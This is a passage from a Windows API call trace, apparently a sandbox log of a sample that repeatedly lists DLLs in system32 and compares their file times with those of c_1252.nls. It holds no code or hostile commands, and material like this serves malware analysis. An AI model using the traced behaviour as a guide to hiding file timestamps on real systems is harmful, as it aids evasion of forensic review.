[0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] StrChrA (lpStart="clb.dll", wMatch=0x2e) returned=".dll" [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindClose (in: hFindFile=0x59e830 | out: hFindFile=0x59e830) returned 1 [0206.576] lstrlenA (lpString="autoclb") returned 7 [0206.576] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0206.576] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x23c8750, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0206.576] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0206.576] GetFileTime (in: hFile=0x178, lpCreationTime=0x1eafeac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1eafeac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0206.576] CloseHandle (hObject=0x178) returned 1 [0206.576] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0206.576] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0206.576] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 0x59e370 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.576] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.576] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] StrChrA (lpStart="adsldpc.dll", wMatch=0x2e) returned=".dll" [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.577] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.577] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.578] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.578] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.579] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.579] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.580] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.580] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.581] FindNextFileA (in: hFindFile=0x59e370, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.581] CompareFileTime 